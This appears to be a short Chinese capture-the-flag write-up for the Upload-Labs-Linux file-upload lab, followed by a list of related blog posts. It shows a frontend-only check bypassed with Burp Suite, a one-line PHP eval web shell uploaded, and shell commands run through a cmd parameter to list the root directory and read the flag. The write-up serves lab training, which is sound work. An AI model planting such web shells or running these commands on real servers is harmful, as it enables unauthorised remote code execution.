Upload-Labs-Linux

文件上传漏洞

这里上传文件我们可以打开检查,可以看到该页面对上传文件做了相关的限定,但是只是在前端页面进行了相关的验证,后端不知道,但是我们可以试试绕过前端的校验,可以在设置中禁用javascript,也可以进行burpsuite进行抓包

这里使用抓包,上传的文件木马为获取该服务器的cmd权限

这里的校验为前端,我们上传木马文件

<?php @eval($_GET'cmd');?>木马文件需要后缀为jpg,这里使用burpsuite抓包后修改后缀后在发送

这里发送完成后就可以访问服务器了

检查一下是否拥有权限

核心代码

?cmd=phpinfo();

权限拥有,找到flag只需要查看该服务器的文件目录

核心代码

?cmd=system('ls /');

查看flag就好了

?cmd=system('cat /flag');

相关推荐
是三一seven29 分钟前
Sql注入基础
数据库·安全·网络安全
学逆向的1 天前
汇编——JCC指令
开发语言·汇编·网络安全
腾霄星月1 天前
Cobalt Strike(CS)内网渗透工具核心重点知识总结
网络安全·cs·cobalt strike
网安老伯2 天前
网络安全基础要点知识介绍(非常详细),零基础入门到精通,看这一篇就够了
运维·前端·网络协议·web安全·网络安全·职场和发展
绘梨衣的sakura路2 天前
Fastjson ≤ 1.2.83 新型 RCE 漏洞深度分析:三层绕过机制与完整利用链
安全·web安全·json
北龙云海2 天前
案例分享 | 面向公网业务系统境内访问白名单配置实操方案
运维·网络·安全·网络安全·告警·数据泄露·入侵攻击
niaiheni2 天前
Fastjson 1.2.83 “Gadget-Free“ RCE
网络·安全·web安全
Draina2 天前
CBC填充预言攻击-CBC Padding Oracle Crypto Attack
python·安全·web安全·网络安全·密码学·安全性测试
白山云北诗2 天前
漏洞扫描+渗透测试:从资产摸底到风险验证,完成二次安全收口
网络·安全·web安全·渗透测试·漏洞扫描·ddos防护·cc防护
国际云,接待3 天前
Google Cloud Armor实战:给网站API加WAF、限速和日志验证
后端·网络安全·云计算·googlecloud